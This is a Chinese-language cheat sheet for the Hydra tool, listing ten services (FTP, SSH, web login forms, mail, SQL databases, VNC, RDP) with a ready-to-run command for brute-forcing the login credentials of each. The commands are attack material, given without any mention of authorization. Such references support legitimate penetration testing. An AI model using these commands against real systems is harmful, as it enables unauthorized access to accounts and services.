| FTP |
文件传输协议 (FTP) |
用于强制获取 FTP 服务的登录凭据,通常用于通过网络传输文件。 |
hydra -l admin -P /path/to/password_list.txt ftp://192.168.1.100 |
| SSH |
安全外壳 (SSH) |
针对 SSH 服务进行暴力破解凭证,通常用于安全远程登录系统。 |
hydra -l root -P /path/to/password_list.txt ssh://192.168.1.100 |
| http-post-fom |
HTTP Web 服务 |
用于通过 GET 或 POST 请求强制获取 HTTP Web 登录表单的登录凭据。 |
hydra -l admin -P /path/to/password_list.txt http-post-form "/login.php:user=^USER^&pass=^PASS^:F=incorrect" |
| smtp |
简单邮件传输协议 |
通过暴力破解通常用于发送电子邮件的 SMTP 登录凭据来攻击电子邮件服务器。 |
hydra -l admin -P /path/to/password_list.txt smtp://mail.server.com |
| pop3 |
邮局协议 (POP3) |
以电子邮件检索服务为目标,暴力破解 POP3 登录凭证。 |
hydra -l user@example.com -P /path/to/password_list.txt pop3://mail.server.com |
| imap |
互联网消息访问协议 |
用于强制获取 IMAP 服务的凭证,从而允许用户远程访问他们的电子邮件。 |
hydra -l user@example.com -P /path/to/password_list.txt imap://mail.server.com |
| mysql |
MySQL 数据库 |
尝试强制获取 MySQL 数据库的登录凭据。 |
hydra -l root -P /path/to/password_list.txt mysql://192.168.1.100 |
| mssql |
微软 SQL 服务器 |
以 Microsoft SQL 服务器为目标,暴力破解数据库登录凭据。 |
hydra -l sa -P /path/to/password_list.txt mssql://192.168.1.100 |
| vnc |
虚拟网络计算 (VNC) |
暴力破解 VNC 服务,用于远程桌面访问。 |
hydra -P /path/to/password_list.txt vnc://192.168.1.100 |
| rdp |
远程桌面协议 (RDP) |
针对 Microsoft RDP 服务进行远程登录暴力破解。 |
hydra -l admin -P /path/to/password_list.txt rdp://192.168.1.100 |